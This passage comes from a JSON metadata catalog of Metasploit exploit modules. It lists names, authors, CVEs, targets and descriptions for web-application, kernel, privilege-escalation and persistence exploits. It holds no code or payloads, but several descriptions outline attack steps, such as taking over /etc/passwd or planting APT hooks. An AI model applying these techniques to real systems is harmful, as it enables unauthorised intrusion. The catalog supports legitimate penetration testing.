"AutoSec Tools",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in V-CMS's inline image upload feature.\n The problem is due to the inline_image_upload.php file not checking the file type\n before saving it on the web server. This allows any malicious user to upload a\n script (such as PHP) without authentication, and then execute it with a GET request.\n\n The issue is fixed in 1.1 by checking the extension name. By default, 1.1 only\n allows jpg, jpeg, png, gif, bmp, but it is still possible to upload a PHP file as\n one of those extension names, which may still be leveraged in an attack.",
"references": [
"CVE-2011-4828",
"OSVDB-77183",
"BID-50706",
"URL-http://xforce.iss.net/xforce/xfdb/71358"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/vcms_upload.rb",
"is_install_path": true,
"ref_name": "linux/http/vcms_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/wanem_exec": {
"name": "WAN Emulator v2.3 Command Execution",
"full_name": "exploit/linux/http/wanem_exec",
"rank": 600,
"disclosure_date": "2012-08-12",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command execution vulnerability in WAN Emulator\n version 2.3 which can be abused to allow unauthenticated users to execute\n arbitrary commands under the context of the 'www-data' user.\n The 'result.php' script calls shell_exec() with user controlled data\n from the 'pc' parameter. This module also exploits a command execution\n vulnerability to gain root privileges. The 'dosu' binary is suid 'root'\n and vulnerable to command execution in argument one.",
"references": [
"OSVDB-85344",
"OSVDB-85345"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/http/wanem_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/wanem_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/wd_mycloud_multiupload_upload": {
"name": "Western Digital MyCloud multi_uploadify File Upload Vulnerability",
"full_name": "exploit/linux/http/wd_mycloud_multiupload_upload",
"rank": 600,
"disclosure_date": "2017-07-29",
"type": "exploit",
"author": [
"Zenofex <zenofex@exploitee.rs>"
],
"description": "This module exploits a file upload vulnerability found in Western Digital's MyCloud\n NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php\n PHP script provides multipart upload functionality that is accessible without authentication\n and can be used to place a file anywhere on the device's file system. This allows an\n attacker the ability to upload a PHP shell onto the device and obtain arbitrary code\n execution as root.",
"references": [
"URL-https://www.exploitee.rs/index.php/Western_Digital_MyCloud#.2Fjquery.2Fuploader.2Fmulti_uploadify.php_.28added_08.2F06.2F2017.29",
"URL-https://download.exploitee.rs/file/generic/Exploiteers-DEFCON25.pdf",
"URL-https://www.youtube.com/watch?v=EO_49pfmA5A",
"CVE-2017-17560"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2017-12-13 18:50:21 +0000",
"path": "/modules/exploits/linux/http/wd_mycloud_multiupload_upload.rb",
"is_install_path": true,
"ref_name": "linux/http/wd_mycloud_multiupload_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/webcalendar_settings_exec": {
"name": "WebCalendar 1.2.4 Pre-Auth Remote Code Injection",
"full_name": "exploit/linux/http/webcalendar_settings_exec",
"rank": 600,
"disclosure_date": "2012-04-23",
"type": "exploit",
"author": [
"EgiX",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in k5n.us WebCalendar, version 1.2.4 or\n less. If not removed, the settings.php script meant for installation can be\n updated by an attacker, who can then inject code into it. This allows arbitrary code\n execution as www-data.",
"references": [
"CVE-2012-1495",
"OSVDB-81329",
"EDB-18775"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WebCalendar 1.2.4 on Linux"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/webcalendar_settings_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/webcalendar_settings_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/webid_converter": {
"name": "WeBid converter.php Remote PHP Code Injection",
"full_name": "exploit/linux/http/webid_converter",
"rank": 600,
"disclosure_date": "2011-07-05",
"type": "exploit",
"author": [
"EgiX",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in WeBid version 1.0.2.\n By abusing the converter.php file, a malicious user can inject PHP code\n in the includes/currencies.php script without any authentication, which\n results in arbitrary code execution.",
"references": [
"OSVDB-73609",
"EDB-17487",
"URL-http://www.webidsupport.com/forums/showthread.php?3892"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WeBid 1.0.2 / Ubuntu"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/webid_converter.rb",
"is_install_path": true,
"ref_name": "linux/http/webid_converter",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/wipg1000_cmd_injection": {
"name": "WePresent WiPG-1000 Command Injection",
"full_name": "exploit/linux/http/wipg1000_cmd_injection",
"rank": 600,
"disclosure_date": "2017-04-20",
"type": "exploit",
"author": [
"Matthias Brun"
],
"description": "This module exploits a command injection vulnerability in an undocumented\n CGI file in several versions of the WePresent WiPG-1000 devices.\n Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.",
"references": [
"URL-https://www.redguard.ch/advisories/wepresent-wipg1000.txt"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WiPG-1000 <=2.0.0.7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/wipg1000_cmd_injection.rb",
"is_install_path": true,
"ref_name": "linux/http/wipg1000_cmd_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/xplico_exec": {
"name": "Xplico Remote Code Execution",
"full_name": "exploit/linux/http/xplico_exec",
"rank": 600,
"disclosure_date": "2017-10-29",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal\n command under the context of the root user.\n\n The specific flaw exists within Xplico, which listens on TCP port 9876 by default. The goal of Xplico is to extract the application data contained in an internet\n traffic capture. There is a hidden endpoint inside Xplico that allows anyone to create\n a new user. Once the user is created through the /users/register endpoint, it must be activated via an activation e-mail. After the registration, Xplico tries\n to send an e-mail that contains the activation code. Unfortunately, this e-mail will probably not reach the given e-mail address on most installations.\n However, it is possible to calculate exactly the same token value because of the use of an insecure cryptographic random string generator function.\n\n One of the features of Xplico is related to parsing PCAP files. Once a PCAP file is uploaded, Xplico executes an operating system command in order to calculate the checksum\n of the file. The file name used for this operation is directly taken from user input and then used inside the command without proper input validation.",
"references": [
"CVE-2017-16666",
"URL-https://pentest.blog/advisory-xplico-unauthenticated-remote-code-execution-cve-2017-16666/",
"URL-https://www.xplico.org/archives/1538"
],
"platform": "Unix",
"arch": "cmd",
"rport": 9876,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-15 01:04:06 +0000",
"path": "/modules/exploits/linux/http/xplico_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/xplico_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/zabbix_sqli": {
"name": "Zabbix 2.0.8 SQL Injection and Remote Code Execution",
"full_name": "exploit/linux/http/zabbix_sqli",
"rank": 600,
"disclosure_date": "2013-09-23",
"type": "exploit",
"author": [
"Lincoln <Lincoln@corelan.be>",
"Jason Kratzer <pyoor@corelan.be>"
],
"description": "This module exploits an unauthenticated SQL injection vulnerability affecting Zabbix\n versions 2.0.8 and lower. The SQL injection issue can be abused in order to retrieve an\n active session ID. If an administrator level user is identified, remote code execution\n can be gained by uploading and executing remote scripts via the 'scripts_exec.php' file.",
"references": [
"CVE-2013-5743",
"URL-https://support.zabbix.com/browse/ZBX-7091"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Zabbix version <= 2.0.8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/zabbix_sqli.rb",
"is_install_path": true,
"ref_name": "linux/http/zabbix_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/zen_load_balancer_exec": {
"name": "ZEN Load Balancer Filelog Command Execution",
"full_name": "exploit/linux/http/zen_load_balancer_exec",
"rank": 600,
"disclosure_date": "2012-09-14",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in ZEN Load Balancer\n version 2.0 and 3.0-rc1 which could be abused to allow authenticated users\n to execute arbitrary code under the context of the 'root' user.\n The 'content2-2.cgi' file uses user controlled data from the 'filelog'\n parameter within backticks.",
"references": [
"OSVDB-85654",
"URL-http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 444,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/http/zen_load_balancer_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/zen_load_balancer_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/zenoss_showdaemonxmlconfig_exec": {
"name": "Zenoss 3 showDaemonXMLConfig Command Execution",
"full_name": "exploit/linux/http/zenoss_showdaemonxmlconfig_exec",
"rank": 400,
"disclosure_date": "2012-07-30",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command execution vulnerability in Zenoss 3.x\n which could be abused to allow authenticated users to execute arbitrary\n code under the context of the 'zenoss' user. The show_daemon_xml_configs()\n function in the 'ZenossInfo.py' script calls Popen() with user\n controlled data from the 'daemon' parameter.",
"references": [
"URL-http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/",
"OSVDB-84408"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/zenoss_showdaemonxmlconfig_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/zimbra_xxe_rce": {
"name": "Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF",
"full_name": "exploit/linux/http/zimbra_xxe_rce",
"rank": 600,
"disclosure_date": "2019-03-13",
"type": "exploit",
"author": [
"An Trinh",
"Khanh Viet Pham",
"Jacob Robles"
],
"description": "This module exploits an XML external entity vulnerability and a\n server side request forgery to get unauthenticated code execution\n on Zimbra Collaboration Suite. The XML external entity vulnerability\n in the Autodiscover Servlet is used to read a Zimbra configuration\n file that contains an LDAP password for the 'zimbra' account. The\n zimbra credentials are then used to get a user authentication cookie\n with an AuthRequest message. Using the user cookie, a server side request\n forgery in the Proxy Servlet is used to proxy an AuthRequest with\n the 'zimbra' credentials to the admin port to retrieve an admin\n cookie. After gaining an admin cookie the Client Upload servlet is\n used to upload a JSP webshell that can be triggered from the web\n server to get command execution on the host. The issues reportedly\n affect Zimbra Collaboration Suite v8.5 to v8.7.11.\n\n This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64\n UBUNTU16_64 FOSS edition.",
"references": [
"CVE-2019-9670",
"CVE-2019-9621",
"URL-https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html"
],
"platform": "Linux",
"arch": "java",
"rport": 8443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2019-04-01 17:21:23 +0000",
"path": "/modules/exploits/linux/http/zimbra_xxe_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/zimbra_xxe_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ids/alienvault_centerd_soap_exec": {
"name": "AlienVault OSSIM av-centerd Command Injection",
"full_name": "exploit/linux/ids/alienvault_centerd_soap_exec",
"rank": 600,
"disclosure_date": "2014-05-05",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in AlienVault 4.6.1 and\n prior. The vulnerability exists in the av-centerd SOAP web service,\n where the update_system_info_debian_package method uses perl backticks\n in an insecure way, allowing command injection. This module has been\n tested successfully on AlienVault 4.6.0.",
"references": [
"CVE-2014-3804",
"BID-67999",
"ZDI-14-202",
"URL-http://forums.alienvault.com/discussion/2690"
],
"platform": "Unix",
"arch": "cmd",
"rport": 40007,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"AlienVault <= 4.6.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb",
"is_install_path": true,
"ref_name": "linux/ids/alienvault_centerd_soap_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ids/snortbopre": {
"name": "Snort Back Orifice Pre-Preprocessor Buffer Overflow",
"full_name": "exploit/linux/ids/snortbopre",
"rank": 400,
"disclosure_date": "2005-10-18",
"type": "exploit",
"author": [
"KaiJern Lau <xwings@mysec.org>"
],
"description": "This module exploits a stack buffer overflow in the Back Orifice pre-processor module\n included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could\n be used to completely compromise a Snort sensor, and would typically gain an attacker\n full root or administrative privileges.",
"references": [
"CVE-2005-3252",
"OSVDB-20034",
"BID-15131"
],
"platform": "Linux",
"arch": "",
"rport": 9080,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Debian 3.1 Sarge"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/ids/snortbopre.rb",
"is_install_path": true,
"ref_name": "linux/ids/snortbopre",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/imap/imap_uw_lsub": {
"name": "UoW IMAP Server LSUB Buffer Overflow",
"full_name": "exploit/linux/imap/imap_uw_lsub",
"rank": 400,
"disclosure_date": "2000-04-16",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the 'LSUB'\n command of the University of Washington IMAP service.\n This vulnerability can only be exploited with a valid username\n and password.",
"references": [
"CVE-2000-0284",
"OSVDB-12037",
"BID-1110",
"EDB-284"
],
"platform": "Linux",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux Bruteforce"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/linux/imap/imap_uw_lsub.rb",
"is_install_path": true,
"ref_name": "linux/imap/imap_uw_lsub",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/abrt_raceabrt_priv_esc": {
"name": "ABRT raceabrt Privilege Escalation",
"full_name": "exploit/linux/local/abrt_raceabrt_priv_esc",
"rank": 600,
"disclosure_date": "2015-04-14",
"type": "exploit",
"author": [
"Tavis Ormandy",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Linux systems with\n a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured\n as the crash handler.\n\n A race condition allows local users to change ownership of arbitrary\n files (CVE-2015-3315). This module uses a symlink attack on\n `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`,\n then adds a new user with UID=0 GID=0 to gain root privileges.\n Winning the race could take a few minutes.\n\n This module has been tested successfully on:\n\n abrt 2.1.11-12.el7 on RHEL 7.0 x86_64;\n abrt 2.1.5-1.fc19 on Fedora Desktop 19 x86_64;\n abrt 2.2.1-1.fc19 on Fedora Desktop 19 x86_64;\n abrt 2.2.2-2.fc20 on Fedora Desktop 20 x86_64;\n abrt 2.3.0-3.fc21 on Fedora Desktop 21 x86_64.",
"references": [
"CVE-2015-3315",
"EDB-36747",
"BID-75117",
"URL-https://gist.github.com/taviso/fe359006836d6cd1091e",
"URL-http://www.openwall.com/lists/oss-security/2015/04/14/4",
"URL-http://www.openwall.com/lists/oss-security/2015/04/16/12",
"URL-https://github.com/abrt/abrt/commit/80408e9e24a1c10f85fd969e1853e0f192157f92",
"URL-https://access.redhat.com/security/cve/cve-2015-1862",
"URL-https://access.redhat.com/security/cve/cve-2015-3315",
"URL-https://access.redhat.com/articles/1415483",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1211223",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1211835",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1218239"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-04-18 09:01:51 +0000",
"path": "/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/abrt_raceabrt_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/af_packet_chocobo_root_priv_esc": {
"name": "AF_PACKET chocobo_root Privilege Escalation",
"full_name": "exploit/linux/local/af_packet_chocobo_root_priv_esc",
"rank": 400,
"disclosure_date": "2016-08-12",
"type": "exploit",
"author": [
"rebel",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a race condition and use-after-free in the\n packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in\n the Linux kernel to execute code as root (CVE-2016-8655).\n\n The bug was initially introduced in 2011 and patched in 2016 in version\n 4.4.0-53.74, potentially affecting a large number of kernels; however\n this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\n 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as\n Linux Mint.\n\n The target system must have unprivileged user namespaces enabled,\n two or more CPU cores, and SMAP must be disabled.\n\n Bypasses for SMEP and KASLR are included. Failed exploitation\n may crash the kernel.\n\n This module has been tested successfully on Linux Mint 17.3 (x86_64);\n Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel\n versions 4.4.0-45-generic and 4.4.0-51-generic.",
"references": [
"EDB-40871",
"CVE-2016-8655",
"BID-94692",
"URL-https://seclists.org/oss-sec/2016/q4/607",
"URL-https://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin",
"URL-https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c",
"URL-https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c",
"URL-https://usn.ubuntu.com/3151-1/",
"URL-https://www.securitytracker.com/id/1037403",
"URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/af_packet_chocobo_root_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"chocobo_root.c"
]
}
},
"exploit_linux/local/af_packet_packet_set_ring_priv_esc": {
"name": "AF_PACKET packet_set_ring Privilege Escalation",
"full_name": "exploit/linux/local/af_packet_packet_set_ring_priv_esc",
"rank": 400,
"disclosure_date": "2017-03-29",
"type": "exploit",
"author": [
"Andrey Konovalov",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a heap-out-of-bounds write in the packet_set_ring\n function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel\n to execute code as root (CVE-2017-7308).\n\n The bug was initially introduced in 2011 and patched in version 4.10.6,\n potentially affecting a large number of kernels; however this exploit\n targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46,\n including Linux distros based on Ubuntu Xenial, such as Linux Mint.\n\n The target system must have unprivileged user namespaces enabled and\n two or more CPU cores.\n\n Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation\n may crash the kernel.\n\n This module has been tested successfully on Linux Mint 18 (x86_64)\n with kernel versions:\n\n 4.8.0-34-generic;\n 4.8.0-36-generic;\n 4.8.0-39-generic;\n 4.8.0-41-generic;\n 4.8.0-42-generic;\n 4.8.0-44-generic;\n 4.8.0-45-generic.",
"references": [
"EDB-41994",
"CVE-2017-7308",
"BID-97234",
"URL-https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html",
"URL-https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308",
"URL-https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html",
"URL-https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c",
"URL-https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/af_packet_packet_set_ring_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/apport_abrt_chroot_priv_esc": {
"name": "Apport / ABRT chroot Privilege Escalation",
"full_name": "exploit/linux/local/apport_abrt_chroot_priv_esc",
"rank": 600,
"disclosure_date": "2015-03-31",
"type": "exploit",
"author": [
"Stéphane Graber",
"Tavis Ormandy",
"Ricardo F. Teixeira",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Linux systems by\n invoking the default coredump handler inside a namespace (\"container\").\n\n Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are\n vulnerable, due to a feature which allows forwarding reports to\n a container's Apport by changing the root directory before loading\n the crash report, causing `usr/share/apport/apport` within the crashed\n task's directory to be executed.\n\n Similarly, Fedora is vulnerable when the kernel crash handler is\n configured to change root directory before executing ABRT, causing\n `usr/libexec/abrt-hook-ccpp` within the crashed task's directory to be\n executed.\n\n In both instances, the crash handler does not drop privileges,\n resulting in code execution as root.\n\n This module has been tested successfully on Apport 2.14.1 on\n Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64.",
"references": [
"CVE-2015-1318",
"URL-http://www.openwall.com/lists/oss-security/2015/04/14/4",
"EDB-36782",
"EDB-36746",
"URL-https://gist.github.com/taviso/0f02c255c13c5c113406",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1211223",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1211835",
"URL-https://usn.ubuntu.com/usn/USN-2569-1/",
"URL-https://code.launchpad.net/~stgraber/apport/pidns-support/+merge/200893",
"URL-https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758",
"URL-http://bazaar.launchpad.net/~apport-hackers/apport/trunk/revision/2943"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-04-19 17:13:57 +0000",
"path": "/modules/exploits/linux/local/apport_abrt_chroot_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/apport_abrt_chroot_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/apt_package_manager_persistence": {
"name": "APT Package Manager Persistence",
"full_name": "exploit/linux/local/apt_package_manager_persistence",
"rank": 600,
"disclosure_date": "1999-03-09",
"type": "exploit",
"author": [
"Aaron Ringo"
],
"description": "This module will run a payload when the package manager is used. No\n handler is run automatically so you must configure an appropriate\n exploit/multi/handler to connect. This module creates a pre-invoke hook\n for APT in apt.conf.d. The hook name syntax is numeric followed by text.",
"references": [
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-04-26 13:11:40 +0000",
"path": "/modules/exploits/linux/local/apt_package_manager_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/apt_package_manager_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/asan_suid_executable_priv_esc": {
"name": "AddressSanitizer (ASan) SUID Executable Privilege Escalation",
"full_name": "exploit/linux/local/asan_suid_executable_priv_esc",
"rank": 600,
"disclosure_date": "2016-02-17",
"type": "exploit",
"author": [
"Szabolcs Nagy",
"infodox",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on Linux systems using\n setuid executables compiled with AddressSanitizer (ASan).\n\n ASan configuration related environment variables are permitted when\n executing setuid executables built with libasan. The `log_path` option\n can be set using the `ASAN_OPTIONS` environment variable, allowing\n clobbering of arbitrary files, with the privileges of the setuid user.\n\n This module uploads a shared object and sprays symlinks to overwrite\n `/etc/ld.so.preload` in order to create a setuid root shell.",
"references": [
"URL-https://seclists.org/oss-sec/2016/q1/363",
"URL-https://seclists.org/oss-sec/2016/q1/379",
"URL-https://gist.github.com/0x27/9ff2c8fb445b6ab9c94e",
"URL-https://github.com/bcoles/local-exploits/tree/master/asan-suid-root"
],
"platform": "Linux",
"arch": "x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-12 09:14:20 +0000",
"path": "/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb",
"is_install_path": true,
"ref_name": "linux/local/asan_suid_executable_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"unsanitary.sh"
]
}
},
"exploit_linux/local/autostart_persistence": {
"name": "Autostart Desktop Item Persistence",
"full_name": "exploit/linux/local/autostart_persistence",
"rank": 600,
"disclosure_date": "2006-02-13",
"type": "exploit",
"author": [
"Eliott Teissonniere"
],
"description": "This module will create an autostart entry to execute a payload.\n The payload will be executed when the user logs in.",
"references": [
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-20 17:51:41 +0000",
"path": "/modules/exploits/linux/local/autostart_persistence.rb",
"is_install_path": true,
"ref_name": "linux/local/autostart_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/local/blueman_set_dhcp_handler_dbus_priv_esc": {
"name": "blueman set_dhcp_handler D-Bus Privilege Escalation",
"full_name": "exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
"rank": 600,
"disclosure_date": "2015-12-18",
"type": "exploit",
"author": [
"Sebastian Krahmer",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges by exploiting a Python\n code injection vulnerability in blueman versions prior to 2.0.3.\n\n The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the\n `set_dhcp_handler` function which uses user input in a call to `eval`,\n without sanitization, resulting in arbitrary code execution as root.\n\n This module has been tested successfully with blueman version 1.23\n on Debian 8 Jessie (x64).",
"references": [
"BID-79688",
"CVE-2015-8612",
"URL-https://twitter.com/thegrugq/status/677809527882813440",
"URL-https://github.com/blueman-project/blueman/issues/416",
"URL-https://www.openwall.com/lists/oss-security/2015/12/18/6",
"URL-https://www.debian.org/security/2015/dsa-3427",
"URL-https://bugs.mageia.org/show_bug.cgi?id=17361",
"URL-http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.421085"
],
"platform": "Linux",
"arch": "x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2019-01-20 09:18:43 +0000",
